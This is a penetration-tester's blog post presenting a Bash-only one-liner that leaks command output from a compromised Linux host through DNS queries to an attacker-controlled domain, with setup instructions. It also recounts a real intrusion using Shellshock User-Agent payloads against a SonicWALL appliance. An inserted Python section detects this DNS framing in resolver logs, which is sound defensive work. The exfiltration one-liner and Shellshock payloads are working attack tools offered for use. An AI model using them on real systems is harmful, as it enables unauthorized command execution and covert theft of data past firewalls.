Bash data exfiltration through DNS (using bash builtin functions)


https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/

After gaining ‘blind’ command execution on a compromised Linux host, data exfiltration can be difficult when the system is protected by a firewall. Sometimes these firewalls prevent the compromised host from establishing connections to the internet. In these cases, data exfiltration through the DNS protocol can be useful, because in a lot of cases DNS queries are not blocked by a firewall. I’ve had a real-life situation like this, which I will describe later on.

There are several one-liners available on the internet to exfiltrate command output through DNS. However, I noticed that these rely on Linux utilities (xxd, od, hexdump, etc.), which are not always present on a minimalistic target system. I decided to create a one-liner that uses only Bash builtin functionality. It can be used whenever command execution is possible and Bash is installed on the compromised system.

I’ve created the following Bash command line, which can be used on the attacked system to execute a command and send its output through DNS:

(LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1)

In order to use it, first change the name servers of your domain so that they point to the IP address of the attacker machine. Two values in the above one-liner also need to be changed: the variable “LINE” must contain the command to execute, for example “ls -l /”, and the variable “domain” must be replaced with the domain that points to your attacker machine. On the attacker machine, the following server-side Ruby script can be started:

[script: dns.rb]

The script will retrieve the output of the executed command. The following screenshot shows the command executed on a targeted system:

[screenshot: dns_client3]

This screenshot shows the retrieved data by the attacker, using the dns.rb script:

[screenshot: dns_server]

There might be improvements possible to the one-liner and the script to make them more efficient, and there might be cases where the one-liner doesn’t work. Do not hesitate to comment on this blog if you have an improvement.
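From the defender's side, the framing the one-liner produces (a random label, a numeric offset, a label of uppercase hex pairs of at most 60 characters, a closing "theend" label, all under one attacker-controlled zone) is a concrete signature in resolver query logs. The following is an added detection example, not the dns.rb script from the post: it parses constructed BIND-style query-log lines, groups matching names per client and zone, deduplicates the A/AAAA lookups a resolver issues for one name, checks that the offsets are contiguous and that the end marker arrived, and reconstructs what left the host so an incident responder can see it. The client address, timestamps and the zone yourdomain.com in the sample lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample query-log lines (BIND-like layout, not taken from the post).
# Names follow the post's framing <random>.<offset>.<hex chunk>.<domain> plus a
# final <random>.theend.<domain> marker; the A and AAAA lines for offset 0 show a
# resolver looking up one name twice, which the decoder must not count twice.
SAMPLE_LOG = """\
17-Jan-2015 10:00:01.120 client 10.0.0.5#41234: query: www.example.com IN A +
17-Jan-2015 10:00:02.004 client 10.0.0.5#41235: query: 21583.60.3D3028726F6F74290A.yourdomain.com IN A +
17-Jan-2015 10:00:02.001 client 10.0.0.5#41236: query: 9921.0.7569643D3028726F6F7429206769643D3028726F6F74292067726F757073.yourdomain.com IN A +
17-Jan-2015 10:00:02.001 client 10.0.0.5#41236: query: 9921.0.7569643D3028726F6F7429206769643D3028726F6F74292067726F757073.yourdomain.com IN AAAA +
17-Jan-2015 10:00:02.010 client 10.0.0.5#41237: query: 30011.theend.yourdomain.com IN A +
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN")
CHUNK_RE = re.compile(r"^\d+\.(?P<offset>\d+)\.(?P<hex>(?:[0-9A-F]{2}){1,30})\.(?P<zone>.+)$")
END_RE = re.compile(r"^\d+\.theend\.(?P<zone>.+)$")


def detect_dns_exfil(log_text):
    """Return {(client, zone): {"complete": bool, "data": bytes}} for each client/zone pair whose queries match the framing."""
    chunks = defaultdict(dict)  # (client, zone) -> {offset: hex chunk}
    ended = set()
    for line in log_text.splitlines():
        q = QUERY_RE.search(line)
        if not q:
            continue
        client, qname = q.group("client"), q.group("qname")
        m = CHUNK_RE.match(qname)
        if m:
            # A resolver may ask A and AAAA for the same name: keep one copy per offset.
            chunks[(client, m.group("zone"))].setdefault(int(m.group("offset")), m.group("hex"))
            continue
        m = END_RE.match(qname)
        if m:
            ended.add((client, m.group("zone")))
    findings = {}
    for key, parts in chunks.items():
        # Offsets index the hex string, so the stream is contiguous only when every
        # offset equals the total length of the chunks that precede it.
        hexdata, contiguous, pos = "", True, 0
        for off in sorted(parts):
            contiguous = contiguous and off == pos
            hexdata += parts[off]
            pos = off + len(parts[off])
        findings[key] = {"complete": contiguous and key in ended,
                         "data": bytes.fromhex(hexdata)}
    return findings
```

Calling detect_dns_exfil(SAMPLE_LOG) flags 10.0.0.5 against yourdomain.com with the recovered id output, while www.example.com produces no finding. The exact regex is brittle against variants of the framing, so in production pair it with a generic heuristic such as the number of distinct subdomains a client requests under one zone per minute.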

Real life scenario

I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following User-Agent header, which returned a 200 HTTP response.

User-agent: () { :; }; /bin/ls

[screenshot: sslvpn_200]

When sending a User-Agent header referencing a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the specified binary):

User-agent: () { :;}; /bin/fake

[screenshot: sslvpn_500]

I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60); however, it did not respond with the command output for commands like ‘ls’. By resolving a hostname with the telnet executable, I discovered that all outgoing connections to the internet were blocked by the machine and only the DNS protocol was allowed. The appliance did not have any executables like xxd, hexdump, etc. Therefore I decided to create the above line, which does not depend on these utilities and so can be used on any system containing Bash.

Dell is already aware of the Shellshock vulnerability in older firmware versions of the SRA. More details on how to patch the issue can be found at:

https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series
